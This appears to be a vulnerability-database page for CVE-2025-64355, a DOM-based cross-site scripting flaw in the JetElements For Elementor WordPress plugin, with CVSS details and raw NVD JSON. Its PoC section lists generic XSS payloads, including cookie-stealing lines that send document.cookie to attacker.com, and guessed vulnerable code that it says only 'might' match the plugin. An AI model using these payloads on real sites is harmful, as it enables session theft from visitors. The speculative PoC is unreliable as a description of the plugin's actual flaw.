Security Vulnerability Report
CVE-2025-64355 CVSS 6.5 MEDIUM

Published: 2025-12-18 17:15:57
Last Modified: 2026-04-23 15:35:12

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Crocoblock JetElements For Elementor (jet-elements) allows DOM-based XSS. This issue affects JetElements For Elementor: from n/a through <= 2.7.12.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

JetElements For Elementor <= 2.7.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-64355 PoC - JetElements For Elementor DOM-based XSS -->
<!-- This PoC demonstrates a DOM-based XSS in JetElements For Elementor plugin -->
<!-- Usage: Inject this payload through plugin's vulnerable parameter handling -->

<!-- Basic XSS Payload -->
<img src=x onerror="alert(document.domain)">

<!-- Cookie Stealing Payload -->
<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">

<!-- Session Hijacking Payload -->
<svg/onload=fetch('https://attacker.com/log?data='+btoa(document.cookie))>

<!-- DOM Manipulation Payload -->
<script>
// Example of how the vulnerable code might process user input
// This simulates the vulnerable endpoint behavior
var userInput = location.hash.substring(1); // or URL parameter
document.write(userInput); // Vulnerable: direct write without sanitization
</script>

<!-- Exploitation Steps:
1. Attacker crafts a malicious URL with XSS payload in affected parameter
2. Victim clicks the link or visits the page containing the payload
3. Plugin processes the parameter without proper sanitization
4. Malicious script executes in victim's browser context
5. Attacker can steal cookies, session tokens, or perform actions as victim
-->

References

https://patchstack.com/database/Wordpress/Plugin/jet-elements/vulnerability/wordpress-jetelements-for-elementor-plugin-2-7-12-cross-site-scripting-xss-vulnerability?_s_id=cve
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-64355",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-18T17:15:56.577",
    "lastModified": "2026-04-23T15:35:12.110",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Crocoblock JetElements For Elementor jet-elements allows DOM-Based XSS.This issue affects JetElements For Elementor: from n/a through <= 2.7.12."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 3.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://patchstack.com/database/Wordpress/Plugin/jet-elements/vulnerability/wordpress-jetelements-for-elementor-plugin-2-7-12-cross-site-scripting-xss-vulnerability?_s_id=cve",
        "source": "[email protected]"
      }
    ]
  }
}